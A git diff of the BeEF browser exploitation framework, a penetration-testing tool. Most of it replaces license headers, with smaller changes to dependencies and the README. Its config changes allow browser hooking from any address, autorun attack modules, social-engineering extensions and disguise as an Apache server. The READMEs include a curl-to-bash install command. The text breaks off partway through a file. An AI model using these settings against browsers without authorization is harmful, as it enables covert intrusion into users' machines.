diff --git a/.gitignore b/.gitignore index c02e0a406..7dacad784 100644 --- a/.gitignore +++ b/.gitignore @@ -1,3 +1,8 @@ beef.db test/msf-test -custom-config.yaml \ No newline at end of file +custom-config.yaml +.DS_Store +.gitignore +.rvmrc + +*.lock diff --git a/BeEFLive.sh b/BeEFLive.sh new file mode 100644 index 000000000..10b06769e --- /dev/null +++ b/BeEFLive.sh @@ -0,0 +1,2 @@ +# Reference for old (<1.2) versions of BeEF Live +bash /opt/beef/liveCD/BeEFLive.sh diff --git a/Gemfile b/Gemfile index 155418d9b..f3dcf01d0 100644 --- a/Gemfile +++ b/Gemfile @@ -1,33 +1,26 @@ # BeEF's Gemfile # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # Gems only required on Windows, or with specific Windows issues if RUBY_PLATFORM.downcase.include?("mswin") || RUBY_PLATFORM.downcase.include?("mingw") gem "win32console" - gem "eventmachine", "1.0.0.beta.4.1" -else - gem "eventmachine", "0.12.10" end +gem "eventmachine", "1.0.3" gem "thin" -gem "sinatra", "1.3.2" +gem "sinatra", "1.4.2" +gem "rack", "1.5.2" gem "em-websocket", "~> 0.3.6" -gem "jsmin", "~> 1.0.1" +gem "uglifier", "~> 2.2.1" +# install https://github.com/cowboyd/therubyracer if the OS is != than OSX +if !RUBY_PLATFORM.downcase.include?("darwin") + gem "therubyracer", "~> 0.12.0" +end gem "ansi" gem "term-ansicolor", :require => "term/ansicolor" gem "dm-core" @@ -38,6 +31,7 @@ gem "parseconfig" gem "erubis" gem "dm-migrations" gem "msfrpc-client" +gem "rubyzip", "~> 1.0.0" # notifications gem "twitter" diff --git a/INSTALL.txt b/INSTALL.txt index fcf9719c5..421d766c2 100644 --- a/INSTALL.txt +++ b/INSTALL.txt @@ -1,18 +1,8 @@ =============================================================================== - Copyright 2012 Wade Alcorn wade@bindshell.net - - Licensed under the Apache License, Version 2.0 (the "License"); - you may not use this file except in compliance with the License. - You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - - Unless required by applicable law or agreed to in writing, software - distributed under the License is distributed on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - See the License for the specific language governing permissions and - limitations under the License. + Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net + Browser Exploitation Framework (BeEF) - http://beefproject.com + See the file 'doc/COPYING' for copying permission =============================================================================== diff --git a/README b/README index cdca66e3c..c584cbd55 100644 --- a/README +++ b/README @@ -1,84 +1,74 @@ -=============================================================================== - - Copyright 2012 Wade Alcorn wade@bindshell.net - - Licensed under the Apache License, Version 2.0 (the "License"); - you may not use this file except in compliance with the License. - You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - - Unless required by applicable law or agreed to in writing, software - distributed under the License is distributed on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - See the License for the specific language governing permissions and - limitations under the License. - -=============================================================================== - -What is BeEF? -------------- - -BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser. - -Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context. - - -Get Involved ------------- - -You can get in touch with the BeEF team. Just check out the following: - - -Please, send us pull requests! - -Web: http://beefproject.com/ - -Mail: beef-subscribe@bindshell.net - -IRC: ircs://irc.freenode.net/beefproject - -Twitter: @beefproject - - -Requirements ------------- - -* OSX 10.5.0 or higher, Modern Linux, Windows XP or higher -* [Ruby](http://rubylang.org) 1.9.2 RVM or higher -* [SQLite](http://sqlite.org) 3.x -* The following GEMS: - - bundler - - thin - - Sinatra - - ANSI - - TERM-ANSIcolor - - dm-core - - json - - data_objects - - dm-sqlite-adapter - - parseconfig - - erubis - - dm-migrations - - msfrpc-client - - eventmachine - - win32console (Windows Only) - - -Quick Start ------------ - -__The following is for the impatient.__ - -For full installation details (including on Microsoft Windows), please refer to INSTALL.txt. - - $ bash -s stable < <(curl -s https://raw.github.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef) - - -Usage ------ - -To get started, simply execute beef and follow the instrustions: - - $ ./beef - +=============================================================================== + + Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net + Browser Exploitation Framework (BeEF) - http://beefproject.com + See the file 'doc/COPYING' for copying permission + +=============================================================================== + +What is BeEF? +------------- + +BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser. + +Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context. + + +Get Involved +------------ + +You can get in touch with the BeEF team. Just check out the following: + + +Please, send us pull requests! + +Web: http://beefproject.com/ + +Mail: beef-subscribe@bindshell.net + +IRC: ircs://irc.freenode.net/beefproject + +Twitter: @beefproject + + +Requirements +------------ + +* OSX 10.5.0 or higher, Modern Linux, Windows XP or higher +* [Ruby](http://rubylang.org) 1.9.2 RVM or higher +* [SQLite](http://sqlite.org) 3.x +* The following GEMS: + - bundler + - thin + - Sinatra + - ANSI + - TERM-ANSIcolor + - dm-core + - json + - data_objects + - dm-sqlite-adapter + - parseconfig + - erubis + - dm-migrations + - msfrpc-client + - eventmachine + - win32console (Windows Only) + + +Quick Start +----------- + +__The following is for the impatient.__ + +For full installation details (including on Microsoft Windows), please refer to INSTALL.txt. + + $ bash -s stable < <(curl -s https://raw.github.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef) + + +Usage +----- + +To get started, simply execute beef and follow the instrustions: + + $ ./beef + diff --git a/README.mkd b/README.mkd index 272b5ae76..d1feda102 100644 --- a/README.mkd +++ b/README.mkd @@ -1,84 +1,77 @@ -=============================================================================== - - Copyright 2012 Wade Alcorn wade@bindshell.net - - Licensed under the Apache License, Version 2.0 (the "License"); - you may not use this file except in compliance with the License. - You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - - Unless required by applicable law or agreed to in writing, software - distributed under the License is distributed on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - See the License for the specific language governing permissions and - limitations under the License. - -=============================================================================== - -What is BeEF? -------------- - -__BeEF__ is short for __The Browser Exploitation Framework__. It is a penetration testing tool that focuses on the web browser. - -Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context. - - -Get Involved ------------- - -You can get in touch with the BeEF team. Just check out the following: - - -__Please, send us pull requests!__ - -__Web:__ http://beefproject.com/ - -__Mail:__ beef-subscribe@bindshell.net - -__IRC:__ ircs://irc.freenode.net/beefproject - -__Twitter:__ @beefproject - - -Requirements ------------- - -* OSX 10.5.0 or higher, Modern Linux, Windows XP or higher -* [Ruby](http://rubylang.org) 1.9.2 RVM or higher -* [SQLite](http://sqlite.org) 3.x -* The following GEMS: - - bundler - - thin - - Sinatra - - ANSI - - TERM-ANSIcolor - - dm-core - - json - - data_objects - - dm-sqlite-adapter - - parseconfig - - erubis - - dm-migrations - - msfrpc-client - - eventmachine - - win32console (Windows Only) - - -Quick Start ------------ - -__The following is for the impatient.__ - -For full installation details (including on Microsoft Windows), please refer to INSTALL.txt. - - $ curl https://raw.github.com/beefproject/beef/a6a7536e/install-beef | bash -s stable - - -Usage ------ - -To get started, simply execute beef and follow the instructions: - - $ ./beef - +=============================================================================== + + Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net + Browser Exploitation Framework (BeEF) - http://beefproject.com + See the file 'doc/COPYING' for copying permission + +=============================================================================== + +What is BeEF? +------------- + +__BeEF__ is short for __The Browser Exploitation Framework__. It is a penetration testing tool that focuses on the web browser. + +Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context. + + +Get Involved +------------ + +You can get in touch with the BeEF team. Just check out the following: + + +__Please, send us pull requests!__ + +__Web:__ http://beefproject.com/ + +__Mail:__ beef-subscribe@bindshell.net + +__IRC:__ ircs://irc.freenode.net/beefproject + +__Twitter:__ @beefproject + + +Requirements +------------ + +* OSX 10.5.0 or higher, Modern Linux, Windows XP or higher +* [Ruby](http://rubylang.org) 1.9.2 RVM or higher +* [SQLite](http://sqlite.org) 3.x +* The following GEMS: + - bundler + - thin + - Sinatra + - ANSI + - TERM-ANSIcolor + - dm-core + - json + - data_objects + - dm-sqlite-adapter + - parseconfig + - erubis + - dm-migrations + - msfrpc-client + - eventmachine + - win32console (Windows Only) + + +Quick Start +----------- + +__The following is for the impatient.__ + +For full installation details (including on Microsoft Windows), please refer to INSTALL.txt. + + $ curl https://raw.github.com/beefproject/beef/a6a7536e/install-beef | bash -s stable + + +Usage +----- + +To get started, simply execute beef and follow the instructions: + + $ ./beef + +On windows use + + $ ruby beef diff --git a/Rakefile b/Rakefile index adb1a8d14..e40188318 100644 --- a/Rakefile +++ b/Rakefile @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # task :default => ["quick"] @@ -86,10 +76,10 @@ end @beef_process_id = nil; task :beef_start => 'beef' do - printf "Starting BeEF (wait 10 seconds)..." + printf "Starting BeEF (wait a few seconds)..." @beef_process_id = IO.popen("ruby ./beef -x 2> /dev/null", "w+") - delays = [2, 2, 1, 1, 1, 0.5, 0.5 , 0.5, 0.3, 0.2, 0.1, 0.1, 0.1, 0.05, 0.05] - delays.each do |i| # delay for 10 seconds + delays = [3, 2, 2, 2, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1] + delays.each do |i| # delay for a few seconds printf '.' sleep (i) end diff --git a/VERSION b/VERSION index ea837d9ad..683cbeb1e 100644 --- a/VERSION +++ b/VERSION @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # -0.4.3.7-alpha +0.4.4.9-alpha diff --git a/beef b/beef index 2a9672d46..7ea4d70c8 100755 --- a/beef +++ b/beef @@ -1,19 +1,9 @@ #!/usr/bin/env ruby # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # stop deprecation warning from being displayed @@ -85,6 +75,7 @@ case config.get("beef.database.driver") DataMapper.setup(:default, :adapter => config.get("beef.database.driver"), :host => config.get("beef.database.db_host"), + :port => config.get("beef.database.db_port"), :username => config.get("beef.database.db_user"), :password => config.get("beef.database.db_passwd"), :database => config.get("beef.database.db_name"), diff --git a/config.yaml b/config.yaml index 46c5e98c0..970cfc3ac 100644 --- a/config.yaml +++ b/config.yaml @@ -1,62 +1,64 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # BeEF Configuration file beef: - version: '0.4.3.7-alpha' + version: '0.4.4.9-alpha' debug: false restrictions: - # subnet of browser ip addresses that can hook to the framework + # subnet of browser ip addresses that can hook to the framework permitted_hooking_subnet: "0.0.0.0/0" - # subnet of browser ip addresses that can connect to the UI + # subnet of browser ip addresses that can connect to the UI # permitted_ui_subnet: "127.0.0.1/32" permitted_ui_subnet: "0.0.0.0/0" - + http: debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace. host: "0.0.0.0" port: "3000" + # Decrease this setting up to 1000 if you want more responsiveness when sending modules and retrieving results. + # It's not advised to decrease it with tons of hooked browsers (more than 50), + # because it might impact performance. Also, enable WebSockets is generally better. + xhr_poll_timeout: 5000 # if running behind a nat set the public ip address here #public: "" #public_port: "" # port setting is experimental - dns: "localhost" - panel_path: "/ui/panel" + # DNS + dns_host: "localhost" + dns_port: 53 + web_ui_basepath: "/ui" hook_file: "/hook.js" hook_session_name: "BEEFHOOK" session_cookie_name: "BEEFSESSION" + # Allow one or multiple domains to access the RESTful API using CORS + # For multiple domains use: "http://browserhacker.com, http://domain2.com" + restful_api: + allow_cors: false + cors_allowed_domains: "http://browserhacker.com" + # Prefer WebSockets over XHR-polling when possible. websocket: enable: false - secure: true # use WebSocketSecure work only on https domain and whit https support enabled in BeEF + secure: true # use 'WebSocketSecure' works only on HTTPS domains and with HTTPS support enabled in BeEF port: 61985 # WS: good success rate through proxies - secure_port: 61986 # WSS - alive_timer: 1000 # poll BeEF every second + secure_port: 61986 # WSSecure + ws_poll_timeout: 1000 # poll BeEF every second # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header) web_server_imitation: - enable: false + enable: true type: "apache" #supported: apache, iis # Experimental HTTPS support for the hook / admin / all other Thin managed web services https: enable: false # In production environments, be sure to use a valid certificate signed for the value - # used in beef.http.dns (the domain name of the server where you run BeEF) + # used in beef.http.dns_host (the domain name of the server where you run BeEF) key: "beef_key.pem" cert: "beef_cert.pem" @@ -65,13 +67,20 @@ beef: # README.databases file # supported DBs: sqlite, mysql, postgres + # NOTE: you must change the Gemfile adding a gem require line like: + # gem "dm-postgres-adapter" + # or + # gem "dm-mysql-adapter" + # if you want to switch drivers from sqlite to postgres (or mysql). + # Finally, run a 'bundle install' command and start BeEF. driver: "sqlite" # db_file is only used for sqlite db_file: "beef.db" - + # db connection information is only used for mysql/postgres db_host: "localhost" + db_port: 5432 db_name: "beef" db_user: "beef" db_passwd: "beef123" @@ -82,18 +91,33 @@ beef: user: "beef" passwd: "beef" + # Autorun modules as soon the browser is hooked. + # NOTE: only modules with target type 'working' or 'user_notify' can be run automatically. + autorun: + enable: true + # set this to FALSE if you don't want to allow auto-run execution for modules with target->user_notify + allow_user_notify: true + crypto_default_value_length: 80 + # Enable client-side debugging + client: + debug: false + # You may override default extension configuration parameters here extension: requester: - enable: true + enable: true proxy: - enable: true + enable: true metasploit: enable: false - console: - shell: - enable: false + social_engineering: + enable: true evasion: enable: false + console: + shell: + enable: false + ipec: + enable: true diff --git a/core/api.rb b/core/api.rb index 0d845d02d..880e326e5 100644 --- a/core/api.rb +++ b/core/api.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF diff --git a/core/api/extension.rb b/core/api/extension.rb index 1358e32d2..bc2a6594f 100644 --- a/core/api/extension.rb +++ b/core/api/extension.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF diff --git a/core/api/extensions.rb b/core/api/extensions.rb index 5d5be8cb2..bb530bd41 100644 --- a/core/api/extensions.rb +++ b/core/api/extensions.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module API diff --git a/core/api/main/configuration.rb b/core/api/main/configuration.rb index d047068a3..ef6d7966a 100644 --- a/core/api/main/configuration.rb +++ b/core/api/main/configuration.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module API diff --git a/core/api/main/migration.rb b/core/api/main/migration.rb index 947503c41..ec7d6eb4a 100644 --- a/core/api/main/migration.rb +++ b/core/api/main/migration.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module API diff --git a/core/api/main/network_stack/assethandler.rb b/core/api/main/network_stack/assethandler.rb index d2dffe0dd..9bcb5df48 100644 --- a/core/api/main/network_stack/assethandler.rb +++ b/core/api/main/network_stack/assethandler.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module API diff --git a/core/api/main/server.rb b/core/api/main/server.rb index 026a1ac5c..78df7c5bd 100644 --- a/core/api/main/server.rb +++ b/core/api/main/server.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module API diff --git a/core/api/main/server/hook.rb b/core/api/main/server/hook.rb index cb34f5244..d00633f2c 100644 --- a/core/api/main/server/hook.rb +++ b/core/api/main/server/hook.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module API diff --git a/core/api/module.rb b/core/api/module.rb index 5bbfc344d..5b0ba140a 100644 --- a/core/api/module.rb +++ b/core/api/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module API diff --git a/core/api/modules.rb b/core/api/modules.rb index 1ee8b1a38..712037e90 100644 --- a/core/api/modules.rb +++ b/core/api/modules.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module API diff --git a/core/bootstrap.rb b/core/bootstrap.rb index 0ae748c22..372ce86d9 100644 --- a/core/bootstrap.rb +++ b/core/bootstrap.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Core @@ -34,6 +24,8 @@ require 'core/main/handlers/browserdetails' # @note Include the network stack require 'core/main/network_stack/handlers/dynamicreconstruction' +require 'core/main/network_stack/handlers/redirector' +require 'core/main/network_stack/handlers/raw' require 'core/main/network_stack/assethandler' require 'core/main/network_stack/api' @@ -50,8 +42,10 @@ require 'core/hbmanager' ## @note Include RESTful API require 'core/main/rest/handlers/hookedbrowsers' require 'core/main/rest/handlers/modules' +require 'core/main/rest/handlers/categories' require 'core/main/rest/handlers/logs' require 'core/main/rest/handlers/admin' +require 'core/main/rest/handlers/server' require 'core/main/rest/api' ## @note Include Websocket diff --git a/core/core.rb b/core/core.rb index 6dcff13f2..c16318217 100644 --- a/core/core.rb +++ b/core/core.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Core @@ -47,4 +37,7 @@ require 'core/main/migration' require 'core/main/console/commandline' require 'core/main/console/banners' +# @note Include rubyzip lib +require 'zip' + diff --git a/core/extension.rb b/core/extension.rb index 7b52fe344..c9535d33d 100644 --- a/core/extension.rb +++ b/core/extension.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extension diff --git a/core/extensions.rb b/core/extensions.rb index f5f2026f2..960599b10 100644 --- a/core/extensions.rb +++ b/core/extensions.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module Extensions diff --git a/core/filters.rb b/core/filters.rb index 1522bb250..88adc8118 100644 --- a/core/filters.rb +++ b/core/filters.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# 